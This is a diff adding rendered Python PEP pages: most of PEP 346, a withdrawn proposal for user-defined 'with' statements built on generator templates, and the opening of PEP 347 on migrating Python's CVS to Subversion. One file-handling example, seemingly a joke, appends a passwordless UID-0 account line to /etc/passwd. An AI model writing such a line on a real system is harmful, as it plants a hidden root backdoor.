+        ELSE_BLOCK
+finally:
+    FINALLY_BLOCK
+
+
+

It can be roughly translated to a statement template as follows:

+
class my_template(object):
+
+    def __init__(self, *args):
+        # Any required arguments (e.g. a file name)
+        # get stored in member variables
+        # The various BLOCK's will need updating to reflect
+        # that.
+
+    def __enter__(self):
+        SETUP_BLOCK
+
+    def __exit__(self, exc_type, value, traceback):
+        try:
+            try:
+                if exc_type is not None:
+                    raise exc_type, value, traceback
+            except exc_type1, exc:
+                EXCEPT_BLOCK1
+            except exc_type2, exc:
+                EXCEPT_BLOCK2
+            except:
+                EXCEPT_BLOCK3
+            else:
+                ELSE_BLOCK
+        finally:
+            FINALLY_BLOCK
+
+
+

Which can then be used as:

+
with my_template(*args):
+    TRY_BLOCK
+
+
+

However, there are two important semantic differences between this +code and the original try statement.

+

Firstly, in the original try statement, if a break, return +or continue statement is encountered in TRY_BLOCK, only +FINALLY_BLOCK will be executed as the statement completes. With +the statement template, ELSE_BLOCK will also execute, as these +statements are treated like any other non-exceptional block +termination. For use cases where it matters, this is likely to be a +good thing (see transaction in the Examples), as this hole where +neither the except nor the else clause gets executed is easy +to forget when writing exception handlers.

+

Secondly, the statement template will not suppress any exceptions. +If, for example, the original code suppressed the exc_type1 and +exc_type2 exceptions, then this would still need to be done inline +in the user code:

+
try:
+    with my_template(*args):
+        TRY_BLOCK
+except (exc_type1, exc_type2):
+    pass
+
+
+

However, even in these cases where the suppression of exceptions needs +to be made explicit, the amount of boilerplate repeated at the calling +site is significantly reduced (See Rejected Options for further +discussion of this behaviour).

+

In general, not all of the clauses will be needed. For resource +handling (like files or synchronisation locks), it is possible to +simply execute the code that would have been part of FINALLY_BLOCK +in the __exit__() method. This can be seen in the following +implementation that makes synchronisation locks into statement +templates as mentioned at the beginning of this section:

+
# New methods of synchronisation lock objects
+
+def __enter__(self):
+    self.acquire()
+    return self
+
+def __exit__(self, *exc_info):
+    self.release()
+
+
+
+
+
+

Generators

+

With their ability to suspend execution, and return control to the +calling frame, generators are natural candidates for writing statement +templates. Adding user defined statements to the language does not +require the generator changes described in this section, thus making +this PEP an obvious candidate for a phased implementation (with +statements in phase 1, generator integration in phase 2). The +suggested generator updates allow arbitrary exception handling to +be factored out like this:

+
@statement_template
+def my_template(*arguments):
+    SETUP_BLOCK
+    try:
+        try:
+            yield
+        except exc_type1, exc:
+            EXCEPT_BLOCK1
+        except exc_type2, exc:
+            EXCEPT_BLOCK2
+        except:
+            EXCEPT_BLOCK3
+        else:
+            ELSE_BLOCK
+    finally:
+        FINALLY_BLOCK
+
+
+

Notice that, unlike the class based version, none of the blocks need +to be modified, as shared values are local variables of the +generator’s internal frame, including the arguments passed in by the +invoking code. The semantic differences noted earlier (all +non-exceptional block termination triggers the else clause, and +the template is unable to suppress exceptions) still apply.

+
+

Default value for yield

+

When creating a statement template with a generator, the yield +statement will often be used solely to return control to the body of +the user defined statement, rather than to return a useful value.

+

Accordingly, if this PEP is accepted, yield, like return, will +supply a default value of None (i.e. yield and yield None +will become equivalent statements).

+

This same change is being suggested in PEP 342. Obviously, it would +only need to be implemented once if both PEPs were accepted :)

+
+
+

Template generator decorator: statement_template

+

As with PEP 343, a new decorator is suggested that wraps a generator +in an object with the appropriate statement template semantics. +Unlike PEP 343, the templates suggested here are reusable, as the +generator is instantiated anew in each call to __enter__(). +Additionally, any exceptions that occur in BLOCK1 are re-raised in +the generator’s internal frame:

+
class template_generator_wrapper(object):
+
+    def __init__(self, func, func_args, func_kwds):
+         self.func = func
+         self.args = func_args
+         self.kwds = func_kwds
+         self.gen = None
+
+    def __enter__(self):
+        if self.gen is not None:
+            raise RuntimeError("Enter called without exit!")
+        self.gen = self.func(*self.args, **self.kwds)
+        try:
+            return self.gen.next()
+        except StopIteration:
+            raise RuntimeError("Generator didn't yield")
+
+    def __exit__(self, *exc_info):
+        if self.gen is None:
+            raise RuntimeError("Exit called without enter!")
+        try:
+            try:
+                if exc_info[0] is not None:
+                    self.gen._inject_exception(*exc_info)
+                else:
+                    self.gen.next()
+            except StopIteration:
+                pass
+            else:
+                raise RuntimeError("Generator didn't stop")
+        finally:
+            self.gen = None
+
+def statement_template(func):
+    def factory(*args, **kwds):
+        return template_generator_wrapper(func, args, kwds)
+    return factory
+
+
+
+
+

Template generator wrapper: __enter__() method

+

The template generator wrapper has an __enter__() method that +creates a new instance of the contained generator, and then invokes +next() once. It will raise a RuntimeError if the last +generator instance has not been cleaned up, or if the generator +terminates instead of yielding a value.

+
+
+

Template generator wrapper: __exit__() method

+

The template generator wrapper has an __exit__() method that +simply invokes next() on the generator if no exception is passed +in. If an exception is passed in, it is re-raised in the contained +generator at the point of the last yield statement.

+

In either case, the generator wrapper will raise a RuntimeError if the +internal frame does not terminate as a result of the operation. The +__exit__() method will always clean up the reference to the used +generator instance, permitting __enter__() to be called again.

+

A StopIteration raised by the body of the user defined statement +may be inadvertently suppressed inside the __exit__() method, but +this is unimportant, as the originally raised exception still +propagates correctly.

+
+
+

Injecting exceptions into generators

+

To implement the __exit__() method of the template generator +wrapper, it is necessary to inject exceptions into the internal frame +of the generator. This is new implementation level behaviour that has +no current Python equivalent.

+

The injection mechanism (referred to as _inject_exception in this +PEP) raises an exception in the generator’s frame with the specified +type, value and traceback information. This means that the exception +looks like the original if it is allowed to propagate.

+

For the purposes of this PEP, there is no need to make this capability +available outside the Python implementation code.

+
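
From the template author’s point of view, an injected exception simply appears at the point of the yield; a sketch (watcher is a hypothetical template):

+
@statement_template
+def watcher():
+    try:
+        yield
+    except ZeroDivisionError:
+        # an exception raised in the statement body is re-raised here,
+        # at the point of the yield
+        print 'saw a ZeroDivisionError in the body'
+        raise
+
+
+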
+
+

Generator finalisation

+

To support resource management in template generators, this PEP will +eliminate the restriction on yield statements inside the try +block of a try/finally statement. Accordingly, generators +which require the use of a file or some such object can ensure the +object is managed correctly through the use of try/finally or +with statements.

+

This restriction will likely need to be lifted globally - it would be +difficult to restrict it so that it was only permitted inside +generators used to define statement templates. Accordingly, this PEP +includes suggestions designed to ensure generators which are not used +as statement templates are still finalised appropriately.

+
+
+

Generator finalisation: TerminateIteration exception

+

A new exception is proposed:

+
class TerminateIteration(Exception): pass
+
+
+

The new exception is injected into a generator in order to request +finalisation. It should not be suppressed by well-behaved code.

+
+
+

Generator finalisation: __del__() method

+

To ensure a generator is finalised eventually (within the limits of +Python’s garbage collection), generators will acquire a __del__() +method with the following semantics:

+
def __del__(self):
+    try:
+        self._inject_exception(TerminateIteration, None, None)
+    except TerminateIteration:
+        pass
+
+
+
+
+

Deterministic generator finalisation

+

There is a simple way to provide deterministic finalisation of +generators - give them appropriate __enter__() and __exit__() +methods:

+
def __enter__(self):
+    return self
+
+def __exit__(self, *exc_info):
+    try:
+        self._inject_exception(TerminateIteration, None, None)
+    except TerminateIteration:
+        pass
+
+
+

Then any generator can be finalised promptly by wrapping the relevant +for loop inside a with statement:

+
with all_lines(filenames) as lines:
+    for line in lines:
+        print line
+
+
+

(See the Examples for the definition of all_lines, and the reason +it requires prompt finalisation)

+

Compare the above example to the usage of file objects:

+
with open(filename) as f:
+    for line in f:
+        print line
+
+
+
+
+

Generators as user defined statement templates

+

When used to implement a user defined statement, a generator should +yield only once on a given control path. The result of that yield +will then be provided as the result of the generator’s __enter__() +method. Having a single yield on each control path ensures that +the internal frame will terminate when the generator’s __exit__() +method is called. Multiple yield statements on a single control +path will result in a RuntimeError being raised by the +__exit__() method when the internal frame fails to terminate +correctly. Such an error indicates a bug in the statement template.

+

To respond to exceptions, or to clean up resources, it is sufficient +to wrap the yield statement in an appropriately constructed +try statement. If execution resumes after the yield without +an exception, the generator knows that the body of the with +statement completed without incident.

+
+
+
+

Examples

+
    +
  1. A template for ensuring that a lock, acquired at the start of a +block, is released when the block is left:
    # New methods on synchronisation locks
    +    def __enter__(self):
    +        self.acquire()
    +        return self
    +
    +    def __exit__(self, *exc_info):
    +        self.release()
    +
    +
    +

    Used as follows:

    +
    with myLock:
    +    # Code here executes with myLock held.  The lock is
    +    # guaranteed to be released when the block is left (even
    +    # if via return or by an uncaught exception).
    +
    +
    +
  2. A template for opening a file that ensures the file is closed when +the block is left:
    # New methods on file objects
    +    def __enter__(self):
    +        if self.closed:
    +            raise RuntimeError, "Cannot reopen closed file handle"
    +        return self
    +
    +    def __exit__(self, *args):
    +        self.close()
    +
    +
    +

    Used as follows:

    +
    with open("/etc/passwd") as f:
    +    for line in f:
    +        print line.rstrip()
    +
    +
    +
  4. +
  5. A template for committing or rolling back a database transaction:
    def transaction(db):
    +    try:
    +        yield
    +    except:
    +        db.rollback()
    +    else:
    +        db.commit()
    +
    +
    +

    Used as follows:

    +
    with transaction(the_db):
    +    make_table(the_db)
    +    add_data(the_db)
    +    # Getting to here automatically triggers a commit
    +    # Any exception automatically triggers a rollback
    +
    +
    +
  6. +
  7. It is possible to nest blocks and combine templates:
    @statement_template
    +def lock_opening(lock, filename, mode="r"):
    +    with lock:
    +        with open(filename, mode) as f:
    +            yield f
    +
    +
    +

    Used as follows:

    +
    with lock_opening(myLock, "/etc/passwd") as f:
    +    for line in f:
    +        print line.rstrip()
    +
    +
    +
  8. +
  9. Redirect stdout temporarily:
    @statement_template
    +def redirected_stdout(new_stdout):
    +    save_stdout = sys.stdout
    +    try:
    +        sys.stdout = new_stdout
    +        yield
    +    finally:
    +        sys.stdout = save_stdout
    +
    +
    +

    Used as follows:

    +
    with open(filename, "w") as f:
    +    with redirected_stdout(f):
    +        print "Hello world"
    +
    +
    +
  10. +
  11. A variant on open() that also returns an error condition:
    @statement_template
    +def open_w_error(filename, mode="r"):
    +    try:
    +        f = open(filename, mode)
    +    except IOError, err:
    +        yield None, err
    +    else:
    +        try:
    +            yield f, None
    +        finally:
    +            f.close()
    +
    +
    +

    Used as follows:

    +
    with open_w_error("/etc/passwd", "a") as f, err:
    +    if err:
    +        print "IOError:", err
    +    else:
    +        f.write("guido::0:0::/:/bin/sh\n")
    +
    +
    +
  12. +
  13. Find the first file with a specific header:
    for name in filenames:
    +    with open(name) as f:
    +        if f.read(2) == "\xfe\xb0":
    +            break
    +
    +
    +
  14. +
  15. Find the first item you can handle, holding a lock for the entire +loop, or just for each iteration:
    with lock:
    +    for item in items:
    +        if handle(item):
    +            break
    +
    +for item in items:
    +    with lock:
    +        if handle(item):
    +            break
    +
    +
    +
  16. +
  17. Hold a lock while inside a generator, but release it when +returning control to the outer scope:
    @statement_template
    +def released(lock):
    +    lock.release()
    +    try:
    +        yield
    +    finally:
    +        lock.acquire()
    +
    +
    +

    Used as follows:

    +
    with lock:
    +    for item in items:
    +        with released(lock):
    +            yield item
    +
    +
    +
  18. +
  19. Read the lines from a collection of files (e.g. processing +multiple configuration sources):
    def all_lines(filenames):
    +    for name in filenames:
    +        with open(name) as f:
    +            for line in f:
    +                yield line
    +
    +
    +

    Used as follows:

    +
    with all_lines(filenames) as lines:
    +    for line in lines:
    +        update_config(line)
    +
    +
    +
  20. +
  21. Not all uses need to involve resource management:
    @statement_template
    +def tag(*args, **kwds):
    +    name = cgi.escape(args[0])
    +    if kwds:
    +        kwd_pairs = ["%s=%s" % (cgi.escape(key), cgi.escape(value))
    +                     for key, value in kwds.items()]
    +        print '<%s %s>' % (name, " ".join(kwd_pairs))
    +    else:
    +        print '<%s>' % name
    +    yield
    +    print '</%s>' % name
    +
    +
    +

    Used as follows:

    +
    with tag('html'):
    +    with tag('head'):
    +       with tag('title'):
    +          print 'A web page'
    +    with tag('body'):
    +       for par in pars:
    +          with tag('p'):
    +             print par
    +       with tag('a', href="http://www.python.org"):
    +           print "Not a dead parrot!"
    +
    +
    +
  22. +
  23. From PEP 343, another useful example would be an operation that +blocks signals. The use could be like this:
    from signal import blocked_signals
    +
    +with blocked_signals():
    +    # code executed without worrying about signals
    +
    +
    +

    An optional argument might be a list of signals to be blocked; by +default all signals are blocked. The implementation is left as an +exercise to the reader (one hedged sketch is given just after this list).

    +
  24. +
  25. Another use for this feature is for Decimal contexts:
    # New methods on decimal Context objects
    +
    +def __enter__(self):
    +    if self._old_context is not None:
    +        raise RuntimeError("Already suspending other Context")
    +    self._old_context = getcontext()
    +    setcontext(self)
    +
    +def __exit__(self, *args):
    +    setcontext(self._old_context)
    +    self._old_context = None
    +
    +
    +

    Used as follows:

    +
    with decimal.Context(precision=28):
    +   # Code here executes with the given context
    +   # The context always reverts after this statement
    +
    +
    +
  26. +
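As promised in example 23, here is one hedged sketch of blocked_signals(). Rather than truly blocking signals (which would require a sigprocmask-style facility), it merely ignores the chosen signals for the duration of the block; the default signal list and the error handling are assumptions on my part:

import signal

@statement_template
def blocked_signals(signums=None):
    if signums is None:
        signums = range(1, signal.NSIG)   # "all signals" by default
    saved = {}
    for signum in signums:
        try:
            saved[signum] = signal.signal(signum, signal.SIG_IGN)
        except (ValueError, RuntimeError):
            pass   # some signals (e.g. SIGKILL) cannot be overridden
    try:
        yield
    finally:
        for signum, old_handler in saved.items():
            signal.signal(signum, old_handler)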
+
+
+

Open Issues

+

None, as this PEP has been withdrawn.

+
+
+

Rejected Options

+
+

Having the basic construct be a looping construct

+

The major issue with this idea, as illustrated by PEP 340’s +block statements, is that it causes problems with factoring +try statements that are inside loops, and contain break and +continue statements (as these statements would then apply to the +block construct, instead of the original loop). As a key goal is +to be able to factor out arbitrary exception handling (other than +suppression) into statement templates, this is a definite problem.

+

There is also an understandability problem, as can be seen in the +Examples. In the example showing acquisition of a lock either for an +entire loop, or for each iteration of the loop, if the user defined +statement was itself a loop, moving it from outside the for loop +to inside the for loop would have major semantic implications, +beyond those one would expect.

+

Finally, with a looping construct, there are significant problems with +TOOWTDI, as it is frequently unclear whether a particular situation +should be handled with a conventional for loop or the new looping +construct. With the current PEP, there is no such problem - for +loops continue to be used for iteration, and the new user defined statements +are used to factor out exception handling.

+

Another issue, specifically with PEP 340’s anonymous block statements, +is that they make it quite difficult to write statement templates +directly (i.e. not using a generator). This problem is addressed by +the current proposal, as can be seen by the relative simplicity of the +various class based implementations of statement templates in the +Examples.

+
+
+

Allowing statement templates to suppress exceptions

+

Earlier versions of this PEP gave statement templates the ability to +suppress exceptions. The BDFL expressed concern over the associated +complexity, and I agreed after reading an article by Raymond Chen +about the evils of hiding flow control inside macros in C code [1].

+

Removing the suppression ability eliminated a whole lot of complexity +from both the explanation and implementation of user defined +statements, further supporting it as the correct choice. Older +versions of the PEP had to jump through some horrible hoops to avoid +inadvertently suppressing exceptions in __exit__() methods - that +issue does not exist with the current suggested semantics.

+

There was one example (auto_retry) that actually used the ability +to suppress exceptions. This use case, while not quite as elegant, +has significantly more obvious control flow when written out in full +in the user code:

+
def attempts(num_tries):
+    return reversed(xrange(num_tries))
+
+for retry in attempts(3):
+    try:
+        make_attempt()
+    except IOError:
+        if not retry:
+            raise
+
+
+

For what it’s worth, the perverse could still write this as:

+
for attempt in auto_retry(3, IOError):
+    try:
+        with attempt:
+            make_attempt()
+    except FailedAttempt:
+        pass
+
+
+

To protect the innocent, the code to actually support that is not +included here.

+
+
+

Differentiating between non-exceptional exits

+

Earlier versions of this PEP allowed statement templates to +distinguish between exiting the block normally, and exiting via a +return, break or continue statement. The BDFL flirted +with a similar idea in PEP 343 and its associated discussion. This +added significant complexity to the description of the semantics, and +it required each and every statement template to decide whether or not +those statements should be treated like exceptions, or like a normal +mechanism for exiting the block.

+

This template-by-template decision process raised great potential for +confusion - consider if one database connector provided a transaction +template that treated early exits like an exception, whereas a second +connector treated them as normal block termination.

+

Accordingly, this PEP now uses the simplest solution - early exits +appear identical to normal block termination as far as the statement +template is concerned.

+
+
+

Not injecting raised exceptions into generators

+

PEP 343 suggests simply invoking next() unconditionally on generators +used to define statement templates. This means the template +generators end up looking rather unintuitive, and the retention of the +ban against yielding inside try/finally means that Python’s +exception handling capabilities cannot be used to deal with management +of multiple resources.

+

The alternative which this PEP advocates (injecting raised exceptions +into the generator frame) means that multiple resources can be +managed elegantly, as shown by lock_opening in the Examples.

+
+
+

Making all generators statement templates

+

Separating the template object from the generator itself makes it +possible to have reusable generator templates. That is, the following +code will work correctly if this PEP is accepted:

+
open_it = lock_opening(parrot_lock, "dead_parrot.txt")
+
+with open_it as f:
+    # use the file for a while
+
+with open_it as f:
+    # use the file again
+
+
+

The second benefit is that iterator generators and template generators +are very different things - the decorator keeps that distinction +clear, and prevents one being used where the other is required.

+

Finally, requiring the decorator allows the native methods of +generator objects to be used to implement generator finalisation.

+
+
+

Using do as the keyword

+

do was an alternative keyword proposed during the PEP 340 +discussion. It reads well with appropriately named functions, but it +reads poorly when used with methods, or with objects that provide +native statement template support.

+

When do was first suggested, the BDFL had rejected PEP 310’s +with keyword, based on a desire to use it for a Pascal/Delphi +style with statement. Since then, the BDFL has retracted this +objection, as he no longer intends to provide such a statement. This +change of heart was apparently based on the C# developers reasons for +not providing the feature [2].

+
+
+

Not having a keyword

+

This is an interesting option, and can be made to read quite well. +However, it’s awkward to look up in the documentation for new users, +and strikes some as being too magical. Accordingly, this PEP goes +with a keyword based suggestion.

+
+
+

Enhancing try statements

+

This suggestion involves giving bare try statements a signature +similar to that proposed for with statements.

+

I think that trying to write a with statement as an enhanced +try statement makes as much sense as trying to write a for +loop as an enhanced while loop. That is, while the semantics of +the former can be explained as a particular way of using the latter, +the former is not an instance of the latter. The additional +semantics added around the more fundamental statement result in a new +construct, and the two different statements shouldn’t be confused.

+

This can be seen by the fact that the ‘enhanced’ try statement +still needs to be explained in terms of a ‘non-enhanced’ try +statement. If it’s something different, it makes more sense to give +it a different name.

+
+
+

Having the template protocol directly reflect try statements

+

One suggestion was to have separate methods in the protocol to cover +different parts of the structure of a generalised try statement. +Using the terms try, except, else and finally, we +would have something like:

+
class my_template(object):
+
+    def __init__(self, *args):
+        # Any required arguments (e.g. a file name)
+        # get stored in member variables
+        # The various BLOCKs will need to be updated to reflect
+        # that.
+
+    def __try__(self):
+        SETUP_BLOCK
+
+    def __except__(self, exc, value, traceback):
+        if isinstance(exc, exc_type1):
+            EXCEPT_BLOCK1
+        elif isinstance(exc, exc_type2):
+            EXCEPT_BLOCK2
+        else:
+            EXCEPT_BLOCK3
+
+    def __else__(self):
+        ELSE_BLOCK
+
+    def __finally__(self):
+        FINALLY_BLOCK
+
+
+

Aside from preferring the addition of two method slots rather than +four, I consider it significantly easier to be able to simply +reproduce a slightly modified version of the original try +statement code in the __exit__() method (as shown in Factoring +out arbitrary exception handling), rather than have to split the +functionality amongst several different methods (or figure out +which method to use if not all clauses are used by the template).

+

To make this discussion less theoretical, here is the transaction +example implemented using both the two method and the four method +protocols instead of a generator. Both implementations guarantee a +commit if a break, return or continue statement is +encountered (as does the generator-based implementation in the +Examples section):

+
class transaction_2method(object):
+
+    def __init__(self, db):
+        self.db = db
+
+    def __enter__(self):
+        pass
+
+    def __exit__(self, exc_type, *exc_details):
+        if exc_type is None:
+            self.db.commit()
+        else:
+            self.db.rollback()
+
+class transaction_4method(object):
+
+    def __init__(self, db):
+        self.db = db
+        self.commit = False
+
+    def __try__(self):
+        self.commit = True
+
+    def __except__(self, exc_type, exc_value, traceback):
+        self.db.rollback()
+        self.commit = False
+
+    def __else__(self):
+        pass
+
+    def __finally__(self):
+        if self.commit:
+            self.db.commit()
+            self.commit = False
+
+
+

There are two more minor points, relating to the specific method names +in the suggestion. The name of the __try__() method is +misleading, as SETUP_BLOCK executes before the try statement +is entered, and the name of the __else__() method is unclear in +isolation, as numerous other Python statements include an else +clause.

+
+
+
+

Iterator finalisation (WITHDRAWN)

+

The ability to use user defined statements inside generators is likely +to increase the need for deterministic finalisation of iterators, as +resource management is pushed inside the generators, rather than being +handled externally as is currently the case.

+

The PEP currently suggests handling this by making all generators +statement templates, and using with statements to handle +finalisation. However, earlier versions of this PEP suggested the +following more complex solution, which allowed the author of a +generator to flag the need for finalisation, and have for loops +deal with it automatically. It is included here as a long, detailed +rejected option.

+
+

Iterator protocol addition: __finish__

+

An optional new method for iterators is proposed, called +__finish__(). It takes no arguments, and should not return +anything.

+

The __finish__ method is expected to clean up all resources the +iterator has open. Iterators with a __finish__() method are +called ‘finishable iterators’ for the remainder of the PEP.

+
+
+

Best effort finalisation

+

A finishable iterator should ensure that it provides a __del__ +method that also performs finalisation (e.g. by invoking the +__finish__() method). This allows Python to still make a best +effort at finalisation in the event that deterministic finalisation is +not applied to the iterator.

+
+
+

Deterministic finalisation

+

If the iterator used in a for loop has a __finish__() method, +the enhanced for loop semantics will guarantee that that method +will be executed, regardless of the means of exiting the loop. This +is important for iterator generators that utilise user defined +statements or the now permitted try/finally statements, or +for new iterators that rely on timely finalisation to release +allocated resources (e.g. releasing a thread or database connection +back into a pool).

+
+
+

for loop syntax

+

No changes are suggested to for loop syntax. This is just to +define the statement parts needed for the description of the +semantics:

+
for VAR1 in EXPR1:
+    BLOCK1
+else:
+    BLOCK2
+
+
+
+
+

Updated for loop semantics

+

When the target iterator does not have a __finish__() method, a +for loop will execute as follows (i.e. no change from the status +quo):

+
itr = iter(EXPR1)
+exhausted = False
+while True:
+    try:
+        VAR1 = itr.next()
+    except StopIteration:
+        exhausted = True
+        break
+    BLOCK1
+if exhausted:
+    BLOCK2
+
+
+

When the target iterator has a __finish__() method, a for loop +will execute as follows:

+
itr = iter(EXPR1)
+exhausted = False
+try:
+    while True:
+        try:
+            VAR1 = itr.next()
+        except StopIteration:
+            exhausted = True
+            break
+        BLOCK1
+    if exhausted:
+        BLOCK2
+finally:
+    itr.__finish__()
+
+
+

The implementation will need to take some care to avoid incurring the +try/finally overhead when the iterator does not have a +__finish__() method.

+
+
+

Generator iterator finalisation: __finish__() method

+

When enabled with the appropriate decorator, generators will have a +__finish__() method that raises TerminateIteration in the +internal frame:

+
def __finish__(self):
+    try:
+        self._inject_exception(TerminateIteration)
+    except TerminateIteration:
+        pass
+
+
+

A decorator (e.g. needs_finish()) is required to enable this +feature, so that existing generators (which are not expecting +finalisation) continue to work as expected.
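As a purely illustrative sketch of what such a decorator might look like (needs_finish() is not specified in detail by the PEP, and the wrapper class here is my assumption), built on the generator throw() method from PEP 342:

class _FinishableGen(object):
    # Hypothetical wrapper that adds __finish__() to a generator-iterator
    def __init__(self, gen):
        self._gen = gen
    def __iter__(self):
        return self
    def next(self):
        return self._gen.next()
    def __finish__(self):
        try:
            self._gen.throw(TerminateIteration)
        except (TerminateIteration, StopIteration):
            pass   # the internal frame terminated, as requested

def needs_finish(genfunc):
    def wrapper(*args, **kwds):
        return _FinishableGen(genfunc(*args, **kwds))
    return wrapper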

+
+
+

Partial iteration of finishable iterators

+

Partial iteration of a finishable iterator is possible, although it +requires some care to ensure the iterator is still finalised promptly +(it was made finishable for a reason!). First, we need a class to +enable partial iteration of a finishable iterator by hiding the +iterator’s __finish__() method from the for loop:

+
class partial_iter(object):
+
+    def __init__(self, iterable):
+        self.itr = iter(iterable)
+
+    def __iter__(self):
+        return self
+
+    def next(self):
+        return self.itr.next()
+
+
+

Secondly, an appropriate statement template is needed to ensure the +iterator is finished eventually:

+
@statement_template
+def finishing(iterable):
+      itr = iter(iterable)
+      itr_finish = getattr(itr, "__finish__", None)
+      if itr_finish is None:
+          yield itr
+      else:
+          try:
+              yield partial_iter(itr)
+          finally:
+              itr_finish()
+
+
+

This can then be used as follows:

+
with finishing(finishable_itr) as itr:
+    for header_item in itr:
+        if end_of_header(header_item):
+            break
+        # process header item
+    for body_item in itr:
+        # process body item
+
+
+

Note that none of the above is needed for an iterator that is not +finishable - without a __finish__() method, it will not be +promptly finalised by the for loop, and hence inherently allows +partial iteration. Allowing partial iteration of non-finishable +iterators as the default behaviour is a key element in keeping this +addition to the iterator protocol backwards compatible.

+
+
+
+

Acknowledgements

+

The acknowledgements section for PEP 340 applies, since this text grew +out of the discussion of that PEP, but additional thanks go to Michael +Hudson, Paul Moore and Guido van Rossum for writing PEP 310 and PEP +340 in the first place, and to (in no meaningful order) Fredrik Lundh, +Phillip J. Eby, Steven Bethard, Josiah Carlson, Greg Ewing, Tim +Delaney and Arnold deVos for prompting particular ideas that made +their way into this text.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0346.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0347/index.html b/pep-0347/index.html new file mode 100644 index 00000000000..f13c7db42da --- /dev/null +++ b/pep-0347/index.html @@ -0,0 +1,408 @@ + + + + + + + + PEP 347 – Migrating the Python CVS to Subversion | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 347 – Migrating the Python CVS to Subversion

+
+
Author:
+
Martin von Löwis <martin at v.loewis.de>
+
Discussions-To:
+
Python-Dev list
+
Status:
+
Final
+
Type:
+
Process
+
Created:
+
14-Jul-2004
+
Post-History:
+
14-Jul-2004
+
+
+
+
Table of Contents +
+
+

Abstract

+

The Python source code is currently managed in a CVS repository on +sourceforge.net. This PEP proposes to move it to a Subversion +repository on svn.python.org.

+
+
+

Rationale

+

This change has two aspects: moving from CVS to Subversion, and moving +from SourceForge to python.org. For each, a rationale will be given.

+
+

Moving to Subversion

+

CVS has a number of limitations that have been eliminated by +Subversion. For the development of Python, the most notable +improvements are:

+
    +
  • the ability to rename files and directories, and to remove +directories, while keeping the history of these files.
  • +
  • support for change sets (sets of correlated changes to multiple +files) through global revision numbers. Change sets are +transactional.
  • +
  • atomic, fast tagging: a cvs tag might take many minutes; a +Subversion tag (svn cp) will complete quickly, and atomically. +Likewise, branches are very efficient.
  • +
  • support for offline diffs, which is useful when creating patches.
  • +
+
+
+

Moving to python.org

+

SourceForge has kindly provided an important infrastructure for the +past years. Unfortunately, the attention that SF received has also +caused repeated overload situations in the past, to which the SF +operators could not always respond in a timely manner. In particular, +for CVS, they had to reduce the load on the primary CVS server by +introducing a second, read-only CVS server for anonymous access. This +server is regularly synchronized, but lags behind the read-write CVS +repository between synchronizations. As a result, users without +commit access can see recent changes to the repository only after a +delay.

+

On python.org, it would be possible to make the repository accessible +for anonymous access.

+
+
+
+

Migration Procedure

+

To move the Python CVS repository, the following steps need to be +executed. The steps are elaborated upon in the following sections.

+
    +
  1. Collect SSH keys for all current committers, along with usernames +to appear in commit messages.
  2. +
  3. At the beginning of the migration, announce that the repository on +SourceForge is closed.
  4. +
  5. 24 hours after the last commit, download the CVS repository.
  6. +
  7. Convert the CVS repository into a Subversion repository.
  8. +
  9. Publish the repository with write access for committers, and +read-only anonymous access.
  10. +
  11. Disable CVS access on SF.
  12. +
+
+

Collect SSH keys

+

After some discussion, svn+ssh was selected as the best method +for write access to the repository. Developers can continue to +use their SSH keys, but they must be installed on python.org.

+

In order to avoid having to create a new Unix user for each +developer, a single account should be used, with command= +attributes in the authorized_keys files.

+

The lines in the authorized_keys file should read like this +(wrapped for better readability):

+
command="/usr/bin/svnserve --root=/svnroot -t
+--tunnel-user='<username>'",no-port-forwarding,
+no-X11-forwarding,no-agent-forwarding,no-pty
+ssh-dss <key> <comment>
+
+
+

For the usernames, the real names should be used instead of +the SF account names, so that people can be better identified +in log messages.

+
+
+

Administrator Access

+

Administrator access to the pythondev account should be granted +to all current admins of the Python SF project. To distinguish +between shell login and svnserve login, admins need to maintain +two keys. Using OpenSSH, the following procedure can be +used to create a second key:

+
cd .ssh
+ssh-keygen -t dsa -f pythondev -C <user>@pythondev
+vi config
+
+
+

In the config file, the following lines need to be added:

+
Host pythondev
+  Hostname dinsdale.python.org
+  User pythondev
+  IdentityFile ~/.ssh/pythondev
+
+
+

Then, shell login becomes possible through “ssh pythondev”.

+
+
+

Downloading the CVS Repository

+

The CVS repository can be downloaded from

+
+
+

Since this tarball is generated only once a day, some time must pass +after the repository freeze before the tarball can be picked up. It +should be verified that the last commit, as recorded on the +python-commits mailing list, is indeed included in the tarball.

+

After the conversion, the converted CVS tarball should be kept +forever on www.python.org/archive/python-cvsroot-<date>.tar.bz2

+
+
+

Converting the CVS Repository

+

The Python CVS repository contains two modules: distutils and python. +The python module is further structured into dist and nondist, +where dist only contains src (the python code proper). nondist +contains various subdirectories.

+

These should be reorganized in the Subversion repository to get +shorter URLs, following the <project>/{trunk,tags,branches} +structure. A project will be created for each nondist directory, +plus for src (called python), plus distutils. Reorganizing the +repository is best done in the CVS tree, as shown below.

+

The fsfs backend should be used as the repository format (which +requires Subversion 1.1). The fsfs backend has the advantage of being +more backup-friendly, as it allows incremental repository backups, +without requiring any dump commands to be run.

+

The conversion should be done using the cvs2svn utility, available +e.g. in the cvs2svn Debian package. As cvs2svn does not currently +support the project/trunk structure, each project needs to be +converted separately. To get each conversion result into a separate +directory in the target repository, svnadmin load must be used.

+

Subversion has a different view on binary-vs-text files than CVS. +To correctly carry the CVS semantics forward, svn:eol-style should +be set to native on all files that are not marked binary in the +CVS.
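For example (hedged; in practice the property would more likely be applied by the conversion tooling itself, and the path below is purely illustrative), the standard Subversion commands for this are:

# mark a converted text file so line endings follow the client platform
svn propset svn:eol-style native python/trunk/README
svn commit -m "Set svn:eol-style native on text files"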

+

In summary, the conversion script is:

+
#!/bin/sh
+rm cvs2svn-*
+rm -rf python py.new
+tar xjf python-cvsroot.tar.bz2
+rm -rf python/CVSROOT
+svnadmin create --fs-type fsfs py.new
+mv python/python python/orig
+mv python/orig/dist/src python/python
+mv python/orig/nondist/* python
+# nondist/nondist is empty
+rmdir python/nondist
+rm -rf python/orig
+for a in python/*
+do
+  b=`basename $a`
+  cvs2svn -q --dump-only --encoding=latin1 --force-branch=cnri-16-start \
+  --force-branch=descr-branch --force-branch=release152p1-patches \
+  --force-tag=r16b1 $a
